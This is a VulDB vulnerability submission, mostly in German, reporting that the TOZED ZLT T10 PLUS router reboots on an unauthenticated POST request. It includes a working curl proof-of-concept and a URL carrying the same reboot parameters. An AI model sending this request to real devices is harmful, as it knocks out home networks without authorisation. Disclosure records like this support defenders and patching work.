Submit #679507: TOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Serviceinfo

TitelTOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Service
Beschreibung The router’s web interface accepts an unauthenticated POST request to `/reqproc/proc_post` with `goformId=REBOOT_DEVICE` and reboots the device without requiring an active authenticated session. This allows an attacker with network access to the router (LAN or guest network depending on configuration) to remotely reboot the device, causing a denial-of-service to the home network. Proof-of-Concept (POC) HTTP request (tested on device): curl -v -X POST "http://192.168.8.1/reqproc/proc_post" \ -H "Content-Type: application/x-www-form-urlencoded;charset=utf-8" \ --data "isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE" PoC video: https://youtu.be/3Me3wlH5cfU
Quelle⚠️ http://192.168.8.1/reqproc/proc_post?isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE
Benutzer
 Anonymous User
Einreichung21.10.2025 22:37 (vor 9 Monaten)
Moderieren08.11.2025 17:44 (18 days later)
StatusAkzeptiert
VulDB Eintrag331635 [TOZED ZLT T10 T10PLUS_3.04.15 Reboot /reqproc/proc_post Denial of Service]
Punkte20

Want to know what is going to be exploited?

We predict KEV entries!